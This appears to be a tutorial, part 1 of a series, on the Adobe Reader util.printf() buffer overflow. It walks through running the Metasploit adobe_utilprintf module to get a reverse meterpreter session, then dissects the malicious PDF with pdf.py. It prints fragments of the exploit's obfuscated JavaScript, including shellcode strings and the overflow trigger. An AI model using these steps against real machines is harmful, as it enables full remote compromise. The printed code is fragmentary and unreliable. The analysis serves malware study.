Hacking PDF: util.prinf() Buffer Overflow: Part 1

1. Introduction

One of the first things we need to do is to remove the PDF Reader we currently have installed and reinstall the old version of PDF Reader.

The old version of PDF Reader can be found on various web pages, but most prominent web page is definitely oldapps. We need to search for a specific version of Adobe PDF Reader, which was vulnerable to the util.printf() buffer overflow vulnerability. But which version do we need? Luckily the exploit for the util.printf() buffer overflow vulnerability can be found in the Metasploit modules as we can see oin the picture below:


The vulnerable version of Adobe PDF Reader is 8.1.2 (including), which we need to download from the oldapps web page and install on the system. The installation process of the old vulnerable PDF Reader can be observed below:


When the installation process is complete, we can check whether the appropriate version was installed on the system. To do that, we can start the Adobe PDF Reader normally and click on Menu - Help - About Adobe Reader 8. We will see a picture presented below:


The right version of Adobe Reader is installed, which is the version 8.1.2. Now we've come to the part where we need to test the Metasploit module. In order to do that we must download the Metasploit, start the msfconsole, and execute the commands below:

msf > use exploit/windows/browser/adobe_utilprintf
msf exploit(adobe_utilprintf) > set PAYLOAD
msf exploit(adobe_utilprintf) > set LHOST 1
msf exploit(adobe_utilprintf) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on
[*] Using URL:
[*] Local IP:
[*] Server started.

First we're executing the command to use the adobe_utilprintf exploit. Then we're setting some common Metasploit variables that are required for everything to work. These variables are PAYLOAD, which specifies the payload that will be executed upon successful execution of the exploit and LHOST, which sets the IP of our meterpreter computer. This IP will be used by the payload to connect back to us, creating a reverse meterpreter session, which will give us complete access to the compromised computer. At the end we're executing the command exploit to run the configured actions.

We can download the generated malicious PDF from the URI and save it on our hard drive as util_printf.pdf. Then we need to copy it to the target machine (the one running the vulnerable version of Adobe PDF Reader) and open it.

When we open the malicious PDF document in a vulnerable Adobe PDF Reader, a new meterpreter session should be opened as can be seen on the picture below:


We can then use the newly created session to interact with the compromised computer. This can be seen in the picture below, where we first enter into the new session with the "sessions -i 1 " command and then execute the sysinfo command, giving us the basic information about the compromised system. In our case, this is a Windows XP SP2 machine running on x86 (32 bit) architecture.


2. Analyzing the PDF Document

The exploit works and gives us the meterpreter session that we want, so why should we care about the details of how this is done? Well, the beauty of everything is in the details, so in this section we'll take a look at how the malicious PDF document was created and how it uses the vulnerable function to execute arbitrary code on the vulnerable computer.

If we open the util_printf.pdf PDF document in a text editor like gvim, we can get some information out of it, but not all of it. For example, the Header of the PDF document is presented in the picture below:


It's a standard 1.5 PDF document with 4 random unicode bytes in the second line. Those bytes are there for one reason only: so that the applications that work with ASCII data don't try to handle and open the document, as it would fail. And the bytes are at the beginning of the file, because applications normally read a first few bytes of the file to determine if they can handle the specific file and open it. Then there is the Body PDF section that is presented in the picture below:


We can't really say anything definitive about this section, except that it uses a lot of different representation of any single character. The character # followed by two characters is a single character represented in a hexadecimal notation. This could be easily changed back into the ASCII form, but we won't do that manually, because it isn't efficient and it's too time consuming (in the modern world we have computers to do the work for us).

In the picture above we also have one encrypted stream, which is non-recognizable right now. In line 29 that stream is terminated by the endstream and on line 30 with endobj keywords. What follows is the Xref table, which we can see in the following picture:


The cross-reference table uses 6 objects. The first object with an offset 0x0 and the generation number 65535 is always present and is not used. The other objects are represented by the following lines. The first used object is located at the byte offset 17 and contains the generation number 0. In fact, all of the objects contain generation number 0, because the PDF document has just been created, and we haven't changed any of the objects in the PDF document, which would cause the generation number to increase. The cross-reference table is clear and provides just the information that we need: there are 6 used objects with different byte offsets usually present in the body of the PDF document (which is encrypted and obfuscated).

What follows is the Trailer section of the PDF document represented in the picture below:


The Trailer contains the /Root element specifying the root object to be the object with an ID 1. There's also the /Size attribute telling us that there are six objects in use (the number 7 is there specifying one more object than there actually is). Afterwards there's the startxref keyword specifying that the cross-reference table starts at byte offset 6386. The last line ends the PDF document file format.

So far we've gathered quite some information about the malicious PDF document, but there's still one section that needs to be analyzed: the Body section of the PDF document. We must be aware of the fact that Adobe documents can use several filters to compress or encode specific objects in the PDF document, making them unreadable in plain-text format. Therefore we can't easily read the object from a PDF file, but need to decompress or decrypt the objects before displaying it on the screen. There are several tools that we can use to do just that.

In the chapters that follow, we'll present various tools that can be used to analyze malicious files. We'll also pretend that we don't know anything about the malicious PDF that we're analyzing, so we'll try almost every possible method out there to try to determine if the PDF document is malicious and how.

3. Checking for Malicious JavaScript

We must be aware of the fact that Adobe PDF Reader uses some open source software components that provide certain features. We can get all the information about the opensource sofware the Adobe PDF Reader uses on the following URI: http://partners.adobe.com/public/developer/opensource/index.html;jsessionid=4518D48D84944EDCE62093D9BB7386C0. It uses the modified version of Mozilla SpiderMonkey JavaScript Engine, which is freely available here: Modified SpiderMonkey. It also uses Sablotron XSLT processor and SAXON XSLT processor, which we won't describe in details, since they are not needed right now.

Often the JavaScript inside the PDF documents is compressed so the analysis of that PDF document is harder (but it can even be used to evade anti-virus or IDS/IPS software). However, the jsunpack-n JavaScript unpacker has a tool named pdf.py that can be used to extract and decompress the JavaScript from the PDF document. The pdf.py Python script knows how to handle and extract the data encoded with the following filters in the PDF document: FlateDecode, ASCIIHexDecode, ASCII85Decode, LZWDecode and RunLengthDecode.

We can decompress the compressed data in PDF document util_printf.pdf with the following command:

# python pdf.py util_printf.pdf

Whenever the above command is run, we get the following output, which prints all the objects from the PDF document. Previously we found out that the PDF document uses six objects with IDs 1 through 6. The first part of the output presents the attributes of each object. The object with an ID 1 is a document catalog that specifies the document's page root node, which is object with an ID 3. The outlines object has an ID 2.

OpenAction specifies the destination that shall be displayed when the document is opened. The value can be an array defining a destination or an action dictionary representing an action. If this entry is not present, the document will be opened on the first page by default.

# python pdf.py util_printf.pdf
parsing util_printf.pdf
obj 1 0:
tag Type (TAG)
tag Catalog (TAG)
tag Outlines = 2 0 R (TAGVAL)
tag Pages = 3 0 R (TAGVAL)
tag OpenAction = 5 0 R (ENDTAG)
obj 2 0:
tag Type (TAG)
tag Outlines (TAG)
tag Count = 0 (ENDTAG)
obj 3 0:
tag Type (TAG)
tag Pages (TAG)
tag Kids = 4 0 R] (TAGVAL)
tag Count = 1 (ENDTAG)
obj 4 0:
tag Type (TAG)
tag Page (TAG)
tag Parent = 3 0 R (TAGVAL)
tag MediaBox = 0 0 612 792] (ENDTAG)
obj 5 0:
tag Type (TAG)
tag Action (TAG)
tag S (TAG)
tag JavaScript (TAG)
tag JS = 6 0 R (ENDTAG)
obj 6 0:
tag Length = 5853 (TAGVAL)
tag Filter (TAGVAL)
tag FlateDecode (TAG)
tag ASCIIHexDecode (ENDTAG)
obj trailer:
tag Size = 7 (TAGVAL)
tag Root = 1 0 R (ENDTAG)

Found JavaScript (delayed) in 1 0 (0 bytes)
children [['Outlines', '2 0'], ['Pages', '3 0'], ['OpenAction', '5
tags [['TAG', 'Type', ''], ['TAG', 'Catalog', ''], ['TAGVAL',
'Outlines', '2 0 R'], ['TAGVAL', 'Pages', '3 0 R'], ['ENDTAG',
'OpenAction', '5 0 R']]
indata = <</#54#79p#65/Ca#74a#6c#6fg/#4f#75tli#6e#65s 2 0
R/#50a#67#65s 3 0 R/#4fp#65n#41ct#69#6f#6e 5 0 R>>
Found JavaScript (delayed) in 5 0 (0 bytes)
children [['JS', '6 0']]
tags [['TAG', 'Type', ''], ['TAG', 'Action', ''], ['TAG', 'S', ''],
['TAG', 'JavaScript', ''], ['ENDTAG', 'JS', '6 0 R']]
indata = <</Type/A#63#74i#6f#6e/S/Ja#76#61#53cr#69pt/JS 6 0
Found JavaScript in 6 0 (5508 bytes)
children []
tags [['TAGVAL', 'Length', '5853'], ['TAGVAL', 'Filter', ''], ['TAG',
'FlateDecode', ''], ['ENDTAG', 'ASCIIHexDecode', '']]
indata = <</#4cen#67t#68
Wrote JavaScript (5595 bytes -- 87 headers / 5508 code) to file

All the objects can be better represented with the picture below:


The /Root elements points to the document catalog, which in turn defines Pages, Outlines and JavaScript objects. The most interesting object is the JavaScript object that describes the JavaScript action object, which is executed upon opening the PDF document. The JavaScript action object (object 5) then defines another object 6, which holds the actual JavaScript, which will be executed. The JavaScript code size is 5853 bytes and is decoded with FlateDecode and ASCIIHexDecode.

The pdf.py script above also wrote the JavaScript code in the file util_printf.pdf.out that is presented below:

c = []; zzzpages.push(c); this.numPages = zzzpages.length;

//jsunpack End PDF headers
var rEjIPqzEByRqKciucyXoQKEoDVmfSgfXhXPTdGqKjKbGNRqlUrIPQvI =
var DYSiOYZIxGfxfSsVwA ="";
DYSiOYZIxGfxfSsVwA += unescape("%u914b%u9814");

= unescape("%u914b%u9814");
fXZbZvta = 20;


< 0x40000)
MdMLejrqWGfyTYiSbrzhcHznoug = new Array();
util.printf("%45000.45000f", 0);

Currently the JavaScript code is not very understandable, because it's highly obfuscated. In the JavaScript, everything above the comment "jsunpack End PDF headers" was added by pdf.py script and all JavaScript below that comment is the actual JavaScript extracted from the PDF document. Why did the jsunpack add c, zzzpages.push and this.numPages JavaScript code to the output file? Because it detected that the extracted JavaScript may try to access those variables and just tries to make them available by adding them to the output file.

4. Conclusion

We've seen that the JavaScript code in the object 6 is executed when the PDF document is opened. But the JavaScript code in that object is obfuscated, so we can't immediately see what the code actually does. In the next part we'll try to determine what the JavaScript code does and if it really is malicious.